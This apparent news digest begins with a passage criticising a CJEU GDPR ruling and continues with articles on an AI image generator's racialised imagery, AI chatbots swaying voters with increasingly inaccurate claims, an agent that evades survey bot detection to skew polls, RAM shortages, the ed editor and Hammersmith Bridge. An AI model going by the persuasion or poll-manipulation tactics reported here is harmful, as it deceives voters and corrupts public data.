Accordingly, inasmuch as the operator of an online marketplace, such as the marketplace at issue in the main proceedings, knows or ought to know that, generally, advertisements containing sensitive data in terms of Article 9(1) of the GDPR, are liable to be published by user advertisers on its online marketplace, that operator, as controller in respect of that processing, is obliged, as soon as its service is designed, to implement appropriate technical and organisational measures in order to identify such advertisements before their publication and thus to be in a position to verify whether the sensitive data that they contain are published in compliance with the principles set out in Chapter II of that regulation. Indeed, as is apparent in particular from Article 25(1) of that regulation, the obligation to implement such measures is incumbent on it not only at the time of the processing, but already at the time of the determination of the means of processing and, therefore, even before sensitive data are published on its online marketplace in breach of those principles, that obligation being specifically intended to prevent such breaches.

No more anonymity allowed:

As regards, in the second place, the question whether the operator of an online marketplace, as controller of the sensitive data contained in advertisements published on its website, jointly with the user advertiser, must verify the identity of that user advertiser before the publication, it should be recalled that it follows from a combined reading of Article 9(1) and Article 9(2)(a) of the GDPR that the publication of such data is prohibited, unless the data subject has given his or her explicit consent to the data in question being published on that online marketplace or one of the other exceptions laid down in Article 9(2)(b) to (j) is satisfied, which does not, however, appear to be the case here.

On that basis, while the placing by a data subject of an advertisement containing his or her sensitive data on an online marketplace may constitute explicit consent, within the meaning of Article 9(2)(a) of the GDPR, such consent is lacking where that advertisement is placed by a third party, unless that party can demonstrate that the data subject has given his or her explicit consent to the publication of that advertisement on the online marketplace in question. Consequently, in order to be able to ensure, and to be able to demonstrate, that the requirements laid down in Article 9(2)(a) of the GDPR are complied with, the operator of the marketplace is required to verify, prior to the publication of such an advertisement, whether the user advertiser preparing to place the advertisement is the person whose sensitive data appear in that advertisement, which presupposes that the identity of that user advertiser is collected.

Finally, as Keller noted above, the CJEU seems to think it’s possible to require platforms to make sure content is never displayed on any other platform as well:

Thus, where sensitive data are published online, the controller is required, under Article 32 of the GDPR, to take all technical and organisational measures to ensure a level of security apt to effectively prevent the occurrence of a loss of control over those data.

To that end, the data controller must consider in particular all technical measures available in the current state of technical knowledge that are apt to block the copying and reproduction of online content .

Again, the CJEU appears to be living in a fantasy land that doesn’t exist.

This is what happens when you over-index on the idea of “data controllers” needing to keep data “private.” Whoever revealed sensitive data should have the liability placed on them. Putting it on the intermediary is misplaced and ridiculous.

There is simply no way to comply with the law under this ruling.

In such a world, the only options are to ignore it, shut down EU operations, or geoblock the EU entirely. I assume most platforms will simply ignore it—and hope that enforcement will be selective enough that they won’t face the full force of this ruling. But that’s a hell of a way to run the internet, where companies just cross their fingers and hope they don’t get picked for an enforcement action that could destroy them.

There’s a reason why the basic simplicity of Section 230 makes sense. It says “the person who creates the content that violates the law is responsible for it.” As soon as you open things up to say the companies that provide the tools for those who create the content can be liable, you’re opening up a can of worms that will create a huge mess in the long run.

That long run has arrived in the EU, and with it, quite the mess.

Filed Under: , , , , , , , ,
Companies: russmedia

Google’s AI Nano Banana Pro accused of generating racialised ‘white saviour’ visuals

Guardian
www.theguardian.com
2025-12-04 19:35:30
Research finds tool depicts white women surrounded by black children when prompted about humanitarian aid in Africa Nano Banana Pro, Google’s new AI-powered image generator, has been accused of creating racialised and “white saviour” visuals in response to prompts about humanitarian aid in Africa – ...
Original Article

Nano Banana Pro, Google’s new AI-powered image generator, has been accused of creating racialised and “white saviour” visuals in response to prompts about humanitarian aid in Africa – and sometimes appends the logos of large charities.

Asking the tool tens of times to generate an image for the prompt “volunteer helps children in Africa” yielded, with two exceptions, a picture of a white woman surrounded by Black children, often with grass-roofed huts in the background.

In several of these images, the woman wore a T-shirt emblazoned with the phrase “Worldwide Vision”, and with the UK charity World Vision’s logo. In another, a woman wearing a Peace Corps T-shirt squatted on the ground, reading The Lion King to a group of children.

AI generated image.
AI-generated image using the tool with the prompt ‘volunteer helps children in Africa’. Illustration: Google

The prompt “heroic volunteer saves African children” yielded multiple images of a man wearing a vest with the logo of the Red Cross.

Arsenii Alenichev, a researcher at the Institute of Tropical Medicine in Antwerp studying the production of global health images, said he noticed these images, and the logos, when experimenting with Nano Banana Pro earlier this month.

“The first thing that I noticed was the old suspects: the white saviour bias, the linkage of dark skin tone with poverty and everything. Then something that really struck me was the logos, because I did not prompt for logos in those images and they appear.”

Examples he shared with the Guardian showed women wearing “Save the Children” and “Doctors Without Borders” T-shirts, surrounded by Black children, with tin-roofed huts in the background. These were also generated in response to the prompt “volunteer helps children in Africa”.

In response to a query from the Guardian, a World Vision spokesperson said: “We haven’t been contacted by Google or Nano Banana Pro, nor have we given permission to use or manipulate our own logo or misrepresent our work in this way.”

Kate Hewitt, the director of brand and creative at Save the Children UK, said: “These AI-generated images do not represent how we work.”

AI image.
An image generated with the prompt ‘volunteer helps children in Africa’. Illustration: Google

She added: “We have serious concerns about third parties using Save the Children’s intellectual property for AI content generation, which we do not consider legitimate or lawful. We’re looking into this further along with what action we can take to address it.”

AI image generators have been shown repeatedly to replicate – and at times exaggerate – US social biases. Models such as Stable Diffusion and OpenAI’s Dall-E offer mostly images of white men when asked to depict “lawyers” or “CEOs”, and mostly images of men of colour when asked to depict “a man sitting in a prison cell”.

Recently, AI-generated images of extreme, racialised poverty have flooded stock photo sites, leading to discussion in the NGO community about how AI tools replicate harmful images and stereotypes, bringing in an era of “poverty porn 2.0”.

It is unclear why Nano Banana Pro adds the logos of real charities to images of volunteers and scenes depicting humanitarian aid.

In response to a query from the Guardian, a Google spokesperson said: “At times, some prompts can challenge the tools’ guardrails and we remain committed to continually enhancing and refining the safeguards we have in place.”

Quick Guide

Contact us about this story

Show

The best public interest journalism relies on first-hand accounts from people in the know.

If you have something to share on this subject, you can contact us confidentially using the following methods.

Secure Messaging in the Guardian app

The Guardian app has a tool to send tips about stories. Messages are end to end encrypted and concealed within the routine activity that every Guardian mobile app performs. This prevents an observer from knowing that you are communicating with us at all, let alone what is being said.

If you don't already have the Guardian app, download it ( iOS / Android ) and go to the menu. Select ‘Secure Messaging’.

SecureDrop, instant messengers, email, telephone and post

If you can safely use the Tor network without being observed or monitored, you can send messages and documents to the Guardian via our SecureDrop platform .

Finally, our guide at theguardian.com/tips lists several ways to contact us securely, and discusses the pros and cons of each.

Illustration: Guardian Design / Rich Cousins

Alpine Linux 3.23.0 released

Linux Weekly News
lwn.net
2025-12-04 19:26:35
Version 3.23.0 of Alpine Linux has been released. Notable changes in this release include an upgrade to version 3.0 of the Alpine Package Keeper (apk), and replacing the linux-edge package with linux-stable: For years, linux-lts and linux-edge grew apart and developed their own kernel configs...
Original Article

Version 3.23.0 of Alpine Linux has been released. Notable changes in this release include an upgrade to version 3.0 of the Alpine Package Keeper (apk), and replacing the linux-edge package with linux-stable :

For years, linux-lts and linux-edge grew apart and developed their own kernel configs, different architectures, etc.

Now linux-edge gets replaced with linux-stable which has the identical configuration as linux-lts, but follows the stable releases instead of the long-term releases (see https://kernel.org/).

The /usr merge planned for this release has been postponed ; a new timeline for the change will be published later. See the release notes for more information on this release.



[$] The beginning of the 6.19 merge window

Linux Weekly News
lwn.net
2025-12-04 19:22:54
As of this writing, 4,124 non-merge commits have been pulled into the mainline repository for the 6.19 kernel development cycle. That is a relatively small fraction of what can be expected this time around, but it contains quite a bit of significant work, with changes to many core kernel subsystems...
Original Article

The page you have tried to view ( The beginning of the 6.19 merge window ) is currently available to LWN subscribers only.

Reader subscriptions are a necessary way to fund the continued existence of LWN and the quality of its content.

If you are already an LWN.net subscriber, please log in with the form below to read this content.

Please consider subscribing to LWN . An LWN subscription provides numerous benefits, including access to restricted content and the warm feeling of knowing that you are helping to keep LWN alive.

(Alternatively, this item will become freely available on December 18, 2025)

Why ed(1)?

Lobsters
blog.thechases.com
2025-12-04 19:18:10
Comments...
Original Article

As the weirdo behind the somewhat tongue-in-cheek @ed1conf account on Twitter and Mastodon , account I'm occasionally asked "Why ed(1) ?" Hopefully some of my reasons for learning & using ed(1) can pique your interest in taking the time to get to know this little piece of history.

Ubiquity

Sometimes your favorite $EDITOR is installed, sometimes it's not. Some, like vi / vim are just about everywhere. Other times, you would have to have sufficient privileges/space to install or compile your editor of choice. But if you know ed , nearly every Linux/BSD/Mac has it installed because it's part of the POSIX standard . It's even small enough to fit on most recovery media without breaking the bank. But between ed and vi/vim , I know that I can get things done even when I'm on a new machine.

Sometimes it's the only editor you have

Several times in my life ed has been the only editor available in certain environments.

  • At $DAYJOB[-1] the Linux-based router needed some configuration changes that the web interface didn't accommodate. So a quick terminal connection later ( telnet , sigh ), I discovered that ed was the only editor available. No problem. Edited the config file and we were back up and running with the proper changes.
  • At the same $DAYJOB[-1] , I developed software for a ruggedized hand-held device and its attached printer . This was back when PDA s were just becoming popular, so this thing was a brick. The DOS-based operating system had no built-in editor, meaning editing files usually meant laboriously copying the file over a serial link to the PC, editing it there, then sending it back down. I longed for the ability to cut that time down but very few of the full-screen editors I tried were even able to successfully paint on the small LCD screen-buffer properly, and of those that did, the on-screen keyboard took up so much screen real-estate as to make them useless. So I installed a DOS build of ed and it worked like a charm (better than edlin.exe that I also tried). Editing turn-around and testing went from 15-20 minutes down to 3-5 minutes per iteration.
  • Some platforms such as Heroku provide only ed as their editor . Not usually an issue since most of the time you're not trying to edit live on the server. But if you need to do it, it's nice to know how.
  • On some MUD games and old BBS es, the text-editor is often an ed -like editor.

Visible editing history

Unless you have a key-echoing utility like Screenkey or Screenflick, it's hard for an audience to see exactly what you did when you're editing during a presentation. It's nice to for the audience to be able to see exactly what you typed if they're trying to follow along.

All commands are ASCII text

Sometimes your terminal emulator or keyboard isn't configured correctly. Function keys, arrows, alt- and meta- modifiers may not transmit properly. Since all of ed 's commands are basic ASCII, it works even if your keyboard/terminal is unable to send extended characters properly.

It works when $TERM is messed up

Likewise, your $TERM setting can get messed up. Sometimes full-screen terminal applications leave the screen in a state where everything is somewhat garbled. Yes, there's reset which will let you reset the terminal back to some sensible defaults, but sometimes your termcap database has trouble too. An editor that only uses stdin and stdout can save your bacon.

Accessibility

Because ed reads all of its commands from stdin and writes all output to stdout in a serial fashion, it's very usable in a screen-reader like yasr or speakup allowing you to edit text without a screen. If you've never edited text sightless, give it a try some time.

Scriptability

Because ed reads all of its commands from stdin it's easy to write a script that will edit a file in an automated fashion.

Previous output

On occasion, I want to see the output of one or more previous shell commands while I continue to edit. A full-screen editor takes over the entire screen, preventing me from seeing that output. With ed the previous output is right there and remains in my scroll-back buffer for reference while I edit. I find this particularly useful when using \e in psql or mysql if my $EDITOR is set to ed . This allows me to edit the SQL while keeping the results of my previous query visible.

Small, fast, light

On resource-constrained systems, sometimes you need something light like ed where the executable and memory-footprint are measured in kilobytes rather than megabytes. This is less of a problem on most systems these days, but with small resource-constrained SOC and embedded boards running Linux or BSD, a light-weight yet powerful editor can help.

Usable on low-bandwidth/high-latency connections

Sometimes you are connected by a slow or very laggy connection. Whether this is a satellite uplink, a 300-baud serial connection, or a congested WAN link, sometimes you simply want to edit productively without the overhead of repainting the screen.

Showing off

Finally, there's a small measure of grey-beard prestige that comes with using an editor that baffles so many people . It's a fast way to demonstrate that I'm not some newbie with cert-only knowledge, but that I enjoy Unix history and working at the command-line. Or maybe it shows that I'm just a little crazy.

The RAM shortage comes for us all

Hacker News
www.jeffgeerling.com
2025-12-04 19:16:11
Comments...
Original Article

Memory price inflation comes for us all, and if you're not affected yet, just wait.

I was building a new PC last month using some parts I had bought earlier this year. The 64 Gigabyte T-Create DDR5 memory kit I used cost $209 then. Today? The same kit costs $650 !

Just in the past week, we found out Raspberry Pi's increasing their single board computer prices . Micron's killing the Crucial brand of RAM and storage devices completely , meaning there's gonna be one fewer consumer memory manufacturer. Samsung can't even buy RAM from themselves to build their own Smartphones, and small vendors like Libre Computer and Mono are seeing RAM prices double, triple, or even worse , and they're not even buying the latest RAM tech!

PC Parts Picker RAM Graph

I think PC builders might be the first crowd to get impacted across the board—just look at these insane graphs from PC Parts Picker , showing RAM prices going from like $30 to $120 for DDR4, or like $150 to five hundred dollars for 64 gigs of DDR5.

But the impacts are only just starting to hit other markets.

Libre Computer mentioned on Twitter a single 4 gigabyte module of LPDDR4 memory costs $35. That's more expensive than every other component on one of their single board computers combined ! You can't survive selling products at a loss, so once the current production batches are sold through, either prices will be increased, or certain product lines will go out of stock.

The smaller the company, the worse the price hit will be. Even Raspberry Pi, who I'm sure has a little more margin built in, already raised SBC prices (and introduced a 1 GB Pi 5—maybe a good excuse for developers to drop Javascript frameworks and program for lower memory requirements again?).

Cameras, gaming consoles, tablets, almost anything that has memory will get hit sooner or later.

I can't believe I'm saying this, but compared to the current market, Apple's insane memory upgrade pricing is... actually in line with the rest of the industry.

The reason for all this, of course, is AI datacenter buildouts. I have no clue if there's any price fixing going on like there was a few decades ago —that's something conspiracy theorists can debate—but the problem is there's only a few companies producing all the world's memory supplies.

And those companies all realized they can make billions more dollars making RAM just for AI datacenter products, and neglect the rest of the market.

So they're shutting down their consumer memory lines, and devoting all production to AI.

Even companies like GPU board manufacturers are getting shafted; Nvidia's not giving memory to them along with their chips like they used to , basically telling them "good luck, you're on your own for VRAM now!"

Which is especially rich, because Nvidia's profiting obscenely off of all this stuff .

That's all bad enough, but some people see a silver lining. I've seen some people say "well, once the AI bubble bursts, at least we'll have a ton of cheap hardware flooding the market!"

And yes, in past decades, that might be one outcome.

But the problem here is the RAM they're making, a ton of it is either integrated into specialized GPUs that won't run on normal computers, or being fitted into special types of memory modules that don't work on consumer PCs, either. (See: HBM ).

That, and the GPUs and servers being deployed now don't even run on normal power and cooling, they're part of massive systems that would take a ton of effort to get running in even the most well-equipped homelabs. It's not like the classic Dell R720 that just needs some air and a wall outlet to run.

That is to say, we might be hitting a weird era where the PC building hobby is gutted, SBCs get prohibitively expensive, and anyone who didn't stockpile parts earlier this year is, pretty much, in a lurch.

Even Lenovo admits to stockpiling RAM , making this like the toilet paper situation back in 2020, except for massive corporations. Not enough supply, so companies who can afford to get some will buy it all up, hoping to stave off the shortages that will probably last longer, partly because of that stockpiling.

I don't think it's completely outlandish to think some companies will start scavenging memory chips (ala dosdude1 ) off other systems for stock, especially if RAM prices keep going up.

It's either that, or just stop making products. There are some echoes to the global chip shortages that hit in 2021-2022, and that really shook up the market for smaller companies.

I hate to see it happening again, but somehow, here we are a few years later, except this time, the AI bubble is to blame.

Sorry for not having a positive note to end this on, but I guess... maybe it's a good time to dig into that pile of old projects you never finished instead of buying something new this year.

How long will this last? That's anybody's guess. But I've already put off some projects I was gonna do for 2026, and I'm sure I'm not the only one.

Russia blocks FaceTime and Snapchat over use in terrorist attacks

Bleeping Computer
www.bleepingcomputer.com
2025-12-04 19:12:18
Russian telecommunications watchdog Roskomnadzor has blocked access to Apple's FaceTime video conferencing platform and the Snapchat instant messaging service, claiming they're being used to coordinate terrorist attacks. [...]...
Original Article

Apple

Russian telecommunications watchdog Roskomnadzor has blocked access to Apple's FaceTime video conferencing platform and the Snapchat instant messaging service, claiming they're being used to coordinate terrorist attacks.

Roskomnadzor said that the two platforms are also being used to recruit criminals and to commit fraud and various other crimes targeting Russian citizens.

"According to law enforcement agencies, the FaceTime service is used to organize and carry out terrorist attacks in the country, recruit their perpetrators, commit fraudulent and other crimes against our citizens," it said in a Thursday statement.

While it didn't announce it until today, the Russian telecom regulator said that Snapchat had been blocked on October 10, "in accordance with the rules of centralized management of the public communication network."

As of this month, Snapchat for Android has been downloaded over 1 billion times on the Google Play Store, while the iOS version has over 5.2 million ratings on Apple's App Store. FaceTime is Apple's proprietary videotelephony platform that comes preinstalled on the company's iOS and macOS devices.

Apple and Snap spokespersons were not immediately available for comment when contacted by BleepingComputer earlier today.

On Wednesday, Roskomnadzor also banned the Roblox online gaming platform for allegedly failing to stop the distribution of what the Russian watchdog described as LGBT propaganda and extremist materials.

Russian news agency Interfax also reported on Friday that Russia is planning to ban Meta's WhatsApp messaging platform , which is now being used by over 3 billion people worldwide.

One year ago, Roskomnadzor blocked the Viber encrypted messaging app , used by hundreds of millions, for violating the country's anti-extremism and anti-terrorism legislation, months after blocking access to the Signal encrypted messaging service for the same reason. ​

In March 2023, it also banned government and state agencies from using foreign private messaging platforms, including Discord, Microsoft Teams, Telegram, Threema, Viber, WhatsApp, and WeChat, claiming that the service had failed to remove "misinformation" from their platforms.

tines

Break down IAM silos like Bitpanda, KnowBe4, and PathAI

Broken IAM isn't just an IT problem - the impact ripples across your whole business.

This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.

Scientists Are Increasingly Worried AI Will Sway Elections

403 Media
www.404media.co
2025-12-04 19:00:28
AI models can meaningfully sway voters on candidates and issues, including by using misinformation, and they are also evading detection in public surveys according to three new studies....
Original Article

🌘

Subscribe to 404 Media to get The Abstract , our newsletter about the most exciting and mind-boggling science news and studies of the week.

Scientists are raising alarms about the potential influence of artificial intelligence on elections, according to a spate of new studies that warn AI can rig polls and manipulate public opinion .

In a study published in Nature on Thursday, scientists report that AI chatbots can meaningfully sway people toward a particular candidate—providing better results than video or television ads. Moreover, chatbots optimized for political persuasion “may increasingly deploy misleading or false information,” according to a separate study published on Thursday in Science.

“The general public has lots of concern around AI and election interference, but among political scientists there’s a sense that it’s really hard to change peoples’ opinions, ” said David Rand, a professor of information science, marketing, and psychology at Cornell University and an author of both studies. “We wanted to see how much of a risk it really is.”

In the Nature study, Rand and his colleagues enlisted 2,306 U.S. citizens to converse with an AI chatbot in late August and early September 2024. The AI model was tasked with both increasing support for an assigned candidate (Harris or Trump) and with increasing the odds that the participant who initially favoured the model’s candidate would vote, or decreasing the odds they would vote if the participant initially favored the opposing candidate—in other words, voter suppression.

In the U.S. experiment, the pro-Harris AI model moved likely Trump voters 3.9 points toward Harris, which is a shift that is four times larger than the impact of traditional video ads used in the 2016 and 2020 elections. Meanwhile, the pro-Trump AI model nudged likely Harris voters 1.51 points toward Trump.

The researchers ran similar experiments involving 1,530 Canadians and 2,118 Poles during the lead-up to their national elections in 2025. In the Canadian experiment, AIs advocated either for Liberal Party leader Mark Carney or Conservative Party leader Pierre Poilievre. Meanwhile, the Polish AI bots advocated for either Rafał Trzaskowski, the centrist-liberal Civic Coalition’s candidate, or Karol Nawrocki, the right-wing Law and Justice party’s candidate.

The Canadian and Polish bots were even more persuasive than in the U.S. experiment: The bots shifted candidate preferences up to 10 percentage points in many cases, three times farther than the American participants. It’s hard to pinpoint exactly why the models were so much more persuasive to Canadians and Poles, but one significant factor could be the intense media coverage and extended campaign duration in the United States relative to the other nations.

“In the U.S., the candidates are very well-known,” Rand said. “They've both been around for a long time. The U.S. media environment also really saturates with people with information about the candidates in the campaign, whereas things are quite different in Canada, where the campaign doesn't even start until shortly before the election.”

“One of the key findings across both papers is that it seems like the primary way the models are changing people's minds is by making factual claims and arguments,” he added. “The more arguments and evidence that you've heard beforehand, the less responsive you're going to be to the new evidence.”

While the models were most persuasive when they provided fact-based arguments, they didn’t always present factual information. Across all three nations, the bot advocating for the right-leaning candidates made more inaccurate claims than those boosting the left-leaning candidates. Right-leaning laypeople and party elites tend to share more inaccurate information online than their peers on the left, so this asymmetry likely reflects the internet-sourced training data.

“Given that the models are trained essentially on the internet, if there are many more inaccurate, right-leaning claims than left-leaning claims on the internet, then it makes sense that from the training data, the models would sop up that same kind of bias,” Rand said.

With the Science study, Rand and his colleagues aimed to drill down into the exact mechanisms that make AI bots persuasive. To that end, the team tasked 19 large language models (LLMs) to sway nearly 77,000 U.K. participants on 707 political issues.

The results showed that the most effective persuasion tactic was to provide arguments packed with as many facts as possible, corroborating the findings of the Nature study. However, there was a serious tradeoff to this approach, as models tended to start hallucinating and making up facts the more they were pressed for information.

“It is not the case that misleading information is more persuasive,” Rand said. ”I think that what's happening is that as you push the model to provide more and more facts, it starts with accurate facts, and then eventually it runs out of accurate facts. But you're still pushing it to make more factual claims, so then it starts grasping at straws and making up stuff that's not accurate.”

In addition to these two new studies, research published in Proceedings of the National Academy of Sciences last month found that AI bots can now corrupt public opinion data by responding to surveys at scale. Sean Westwood, associate professor of government at Dartmouth College and director of the Polarization Research Lab , created an AI agent that exhibited a 99.8 percent pass rate on 6,000 attempts to detect automated responses to survey data.

“Critically, the agent can be instructed to maliciously alter polling outcomes, demonstrating an overt vector for information warfare,” Westwood warned in the study. “These findings reveal a critical vulnerability in our data infrastructure, rendering most current detection methods obsolete and posing a potential existential threat to unsupervised online research.”

Taken together, these findings suggest that AI could influence future elections in a number of ways, from manipulating survey data to persuading voters to switch their candidate preference—possibly with misleading or false information.

To counter the impact of AI on elections, Rand suggested that campaign finance laws should provide more transparency about the use of AI, including canvasser bots, while also emphasizing the role of raising public awareness.

“One of the key take-homes is that when you are engaging with a model, you need to be cognizant of the motives of the person that prompted the model, that created the model, and how that bleeds into what the model is doing,” he said.

🌘

Subscribe to 404 Media to get The Abstract , our newsletter about the most exciting and mind-boggling science news and studies of the week.

Chatbots can sway political opinions but are ‘substantially’ inaccurate, study finds

Guardian
www.theguardian.com
2025-12-04 19:00:28
‘Information-dense’ AI responses are most persuasive but these tend to be less accurate, says security report Chatbots can sway people’s political opinions but the most persuasive artificial intelligence models deliver “substantial” amounts of inaccurate information in the process, according to the ...
Original Article

Chatbots can sway people’s political opinions but the most persuasive artificial intelligence models deliver “substantial” amounts of inaccurate information in the process, according to the UK government’s AI security body.

Researchers said the study was the largest and most systematic investigation of AI persuasiveness to date, involving nearly 80,000 British participants holding conversations with 19 different AI models.

The AI Security Institute carried out the study amid fears that chatbots can be deployed for illegal activities including fraud and grooming.

The topics included “public sector pay and strikes” and “cost of living crisis and inflation”, with participants interacting with a model – the underlying technology behind AI tools such as chatbots – that had been prompted to persuade the users to take a certain stance on an issue.

Advanced models behind ChatGPT and Elon Musk’s Grok were among those used in the study, which was also authored by academics at the London School of Economics, Massachusetts Institute of Technology, the University of Oxford and Stanford University.

Before and after the chat, users reported whether they agreed with a series of statements expressing a particular political opinion.

The study , published in the journal Science on Thursday, found that “information-dense” AI responses were the most persuasive. Instructing the model to focus on using facts and evidence yielded the largest persuasion gains, the study said. However, the models that used the most facts and evidence tended to be less accurate than others.

“These results suggest that optimising persuasiveness may come at some cost to truthfulness, a dynamic that could have malign consequences for public discourse and the information ecosystem,” said the study.

On average, the AI and human participant would exchange about seven messages each in an exchange lasting 10 minutes.

It added that tweaking a model after its initial phase of development, in a practice known as post-training, was an important factor in making it more persuasive. The study made the models, which included freely available “open source” models such as Meta’s Llama 3 and Qwen by the Chinese company Alibaba, more convincing by combining them with “reward models” that recommended the most persuasive outputs.

Researchers added that an AI system’s ability to churn out information could make it more manipulative than the most compelling human.

“Insofar as information density is a key driver of persuasive success, this implies that AI could exceed the persuasiveness of even elite human persuaders, given their unique ability to generate large quantities of information almost instantaneously during conversation,” said the report.

Feeding models personal information about the users they were interacting with did not have as big an impact as post-training or increasing information density, said the study.

Kobi Hackenburg, an AISI research scientist and one of the report’s authors, said: “What we find is that prompting the models to just use more information was more effective than all of these psychologically more sophisticated persuasion techniques.”

However, the study added that there were some obvious barriers to AIs manipulating people’s opinions, such as the amount of time a user may have to engage in a long conversation with a chatbot about politics. There are also theories suggesting there are hard psychological limits to human persuadability, researchers said.

Hackenburg said it was important to consider whether a chatbot could have the same persuasive impact in the real world where there were “lots of competing demands for people’s attention and people aren’t maybe as incentivised to sit and engage in a 10-minute conversation with a chatbot or an AI system”.

Who Hooked Up a Laptop to a 1930s Dance Hall Machine?

Hacker News
www.chrisbako.com
2025-12-04 18:55:06
Comments...
Original Article

I had the pleasure of going to the Netherlands in 2023.

Amsterdam and Rotterdam are cool, but Utrecht has something really special, The Speelkok (Self playing instrument) Museum .

There’s so much cool stuff in there, automata, the only self playing violin, clocks, draaiorgels (street organs), but the coolest is this.

This is playing from a laptop

That is a 1930s dance hall machine. It takes in a cardboard book with hole punches. The music is encoded as punches, each hole means to play that note from the music staff. It replaced music barrels, metal barrals with nubs that hit forks from music boxes, since they could dynamically program the song.

But somehow someone hooked up a laptop to it! So now it can play mp3s from a laptop instead of the book. What ?!

How, why and who are a total mystery to me, but I’d like to find out more.

I’ve sent the museum an email and hope to hear back for more info. It’ll take about 14 business days. If you know anything about this please reach out.

Maybe the internet can help me figure this out?

- Chris

Hammersmith Bridge – Where did 25,000 vehicles go?

Hacker News
nickmaini.substack.com
2025-12-04 18:52:22
Comments...
Original Article

Paris, 15th April 2019, 6:43pm.

Inside the ancient cathedral all is quiet. Afternoon light filters through the stained glass.

A fire alarm pierces the silence.

Within minutes, flames tear through the oak roof. Eight centuries of timber explode into an inferno visible across the city. Parisians gather on the Seine’s banks as the spire collapses through the nave in a cascade of embers.

Hours later, the French President stands before the ruin: “Cette cathédrale, nous la rebâtirons.”

This cathedral, we will rebuild it.

On 8th December 2024, five years and seven months after the fire, Notre-Dame reopens, its spire restored, the rose windows gleaming once again.

London, 10th April 2019, 3:47pm.

Five days earlier, it’s a bright spring afternoon in west London.

On Hammersmith Bridge, traffic inches forward, suffocated by congestion. Above, the suspension chains creak under the weight of queuing cars. Cyclists weave between wing mirrors. Beneath the footpaths, invisible cracks spread deeper into the 132-year-old pedestals.

Engineers monitoring the structure see the warning signs of imminent collapse. The decision is taken: close the bridge to motor traffic immediately.

Barriers go up. The traffic melts away.

Six years later, Hammersmith Bridge remains closed to vehicles. The solution proposed by local authorities costs £250m and has no funding.

Hammersmith Bridge is now completely closed
Hammersmith Bridge (2022). Source

One might reasonably object that comparing Notre-Dame to Hammersmith Bridge is unfair. A Gothic cathedral and a Victorian suspension bridge are worlds apart.

Fair enough. Instead, consider this comparison: Hammersmith Bridge itself.

In 1882 , a boat struck Hammersmith Bridge causing damage that revealed five decades of deterioration. Parliament authorised a replacement in 1883 and provided for a temporary crossing. Four years later, the Prince of Wales opened a new bridge designed by Bazalgette (of London sewer fame ). Cost: £83,000 (£9.5m today). 1

In 2019 , ultrasound revealed dangerous micro-fractures in Hammersmith Bridge’s structure. The bridge was immediately closed with no temporary alternative provided. Six years later, the bridge is still closed to traffic (but stabilised). Cost to date: £48m, with full restoration estimated at £250m. Long-term solution: none.

Our Victorian forebears rebuilt their broken bridge faster than we’ve failed to find a solution for ours.

Source: Author

Hammersmith Bridge isn’t just a local transport problem, it’s symptomatic of Britain’s broader state crisis.

This is happening in central London. Not in a rural “backwater”, not in a “left behind” urban centre, but in one of the wealthiest communities in Britain, on a major transport artery. If Britain cannot fix Hammersmith Bridge, what is failing in places that nobody is watching?

This essay examines two questions.

  • First: how did Britain reach a point where we cannot fix a bridge?

  • Second: given that reality, what should we actually do about Hammersmith Bridge?

The first answer reveals a state crisis: every actor can block decisions; none can compel action.

The second is more surprising.

When the bridge closed, about 25,000 vehicles crossed it daily and TfL predicted a severe economic impact.

Six years later, 9,000 of those journeys have vanished - not diverted to other crossings, but simply evaporated. Yet the local economy has adapted, air quality has improved, and overall traffic congestion has lessened.

This counterintuitive outcome begs the question: are we actually solving the right problem?

The “obvious” £250m solution may be addressing the wrong issue. The best solution may cost far less, involve no cars, and turn paralysis into opportunity.

Hammersmith Bridge on Boat-Race Day (1862) Walter Greaves. Source: Tate

Hammersmith Bridge is a testament to Victorian engineering prowess. The present-day bridge is Bazalgette’s 1887 design: a wrought-iron suspension structure with ornate decorative features and coated in deep green paint that blends into the willow-lined bank.

It replaced an earlier bridge constructed in 1827 by local engineer William Tierney Clark . That first bridge cost £80,000 (approximately £8.9m today), was funded by private investors, and operated as a private toll bridge by the Hammersmith Bridge Company. 2 Unusually amongst London toll bridges, it turned a profit. In 1880, it was purchased by the Metropolitan Board of Works and made toll-free . 3

Clark’s designs at Hammersmith and Marlow so impressed a visiting Hungarian aristocrat that he was later commissioned to build a sister bridge in Budapest, the Széchenyi Chain Bridge over the Danube, which remains a national symbol today. 4

Fifty years later, in 1882, the aforementioned boat collision and concerns about weight capacity on Boat Race days led Parliament to authorise a replacement. 5 A temporary crossing structure was installed and just four years later, on 11th June 1887, Bazalgette’s bridge was opened at the cost of £83,000 (approximately £9.5m today). 6

Hammersmith Bridge (Bazalgette 1887 Design). Source: The Engineer , April 1887

For over 125 years, the bridge received minimal maintenance. 7 This is despite it being bombed three times: by the IRA in 1939, the Provisional IRA in 1996, and the Real IRA in 2000. 8 9

Only in 2014 was a comprehensive structural review first commissioned. 10

The findings were alarming: decades of unchecked corrosion had created micro-fractures throughout the suspension structure, and the Victorian bearings that allow the bridge to flex with temperature had seized solid.

In April 2019, engineers discovered that the micro-fractures had widened enough to close the bridge to vehicles, though pedestrians and cyclists could still cross. Then in August 2020’s heatwave, sensors detected rapid crack expansion. The council’s senior engineer allegedly gave the council leader just 30 seconds to make the critical decision. 11

Cast iron is unforgivingly brittle; it doesn’t bend, it shatters. With the potential for catastrophic collapse into the Thames, the bridge was completely closed, halting both pedestrian and river traffic beneath. 12

Did the review and precautionary measures save lives?

Consider Genoa’s Morandi Bridge , a 210-metre section collapsed in August 2018, killing 43 people. The operator had warned in 2011 that collapse within 10 years was possible, yet adequate action was never taken.

Compare too Dresden’s Carola Bridge , a 100-metre section collapsed in September 2024 just minutes after the last tram crossed. The cause was hidden stress corrosion cracking that had existed since construction in 1971.

In 2021 , stabilisation work was undertaken and the bridge’s side walkways were made accessible to pedestrians and cyclists. 13 Engineers innovatively filled the cast iron pedestals with fibre-reinforced concrete, installed steel support frames, replaced the Victorian bearings with modern rubber ones, and wrapped the chains in foil with air conditioning to keep them cool during heatwaves.

Mott Macdonald Stabilisation Works

What can the stabilised bridge carry?

The local council initially claimed the stabilised restriction limited vehicles to 1 tonne (equivalent to a Fiat 500). After a third FOI request and internal review, the local council acknowledged the maximum allowable mass was 3 tonnes (a Volkswagen Transporter). 14 The bridge cannot support regular buses (12-18 tonnes) or normal traffic, but could theoretically support one lightweight vehicle. The stabilisation has secured the structure, but not restored its function.

In April 2025 , with stabilisation achieved, the main carriageway was reopened to cyclists and pedestrians, exactly six years after the initial closure, but remains closed to all vehicle traffic including buses and cars.

